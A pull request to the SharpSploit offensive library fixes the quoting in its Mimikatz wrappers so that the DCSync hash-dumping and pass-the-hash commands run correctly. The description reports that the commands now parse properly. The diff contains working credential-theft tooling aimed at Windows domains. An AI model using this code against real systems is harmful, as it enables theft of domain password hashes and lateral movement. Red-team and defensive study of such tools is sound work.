### PR TITLE
fix mimikatz quote syntax

### DIFF
--- a/SharpSploit/Credentials/Mimikatz.cs
+++ b/SharpSploit/Credentials/Mimikatz.cs
@@ -156,7 +156,7 @@ namespace SharpSploit.Credentials
         /// <returns>The NTLM hash of the target user(s).</returns>
         public static string DCSync(string user, string FQDN = null, string DC = null)
         {
-            string command = "lsadump::dcsync";
+            string command = "\"lsadump::dcsync";
             if (user.ToLower() == "all")
             {
                 command += " /all";
@@ -175,7 +175,11 @@ namespace SharpSploit.Credentials
             }
             if (DC != null)
             {
-                command += " /dc:" + DC;
+                command += " /dc:" + DC + "\"";
+            }
+            else
+            {
+                command += "\"";
             }
             return Command(command);
         }
@@ -191,7 +195,7 @@ namespace SharpSploit.Credentials
         /// <returns></returns>
         public static string PassTheHash(string user, string NTLM, string FQDN = null, string run = "cmd.exe")
         {
-            string command = "sekurlsa::pth";
+            string command = "\"sekurlsa::pth";
             command += " /user:" + user;
             if (FQDN != null)
             {
@@ -202,7 +206,7 @@ namespace SharpSploit.Credentials
                 command += " /domain:" + IPGlobalProperties.GetIPGlobalProperties().DomainName;
             }
             command += " /ntlm:" + NTLM;
-            command += " /run:" + run;
+            command += " /run:" + run + "\"";
             return Command(command);
         }
     }


### PR DESCRIPTION
Since mimikatz requires the weird quoting, many mimikatz related commands do not work. They result in parameters being passed to separate lines:

![image](https://user-images.githubusercontent.com/21189155/52135015-bd07cc00-25f9-11e9-8501-050eafcdef0b.png)

This fix ensures that commands with spaces are run properly:

![image](https://user-images.githubusercontent.com/21189155/52135066-d90b6d80-25f9-11e9-9f3b-16f5efb41023.png)

This VM isn't on a domain but hey, it tried. 👍 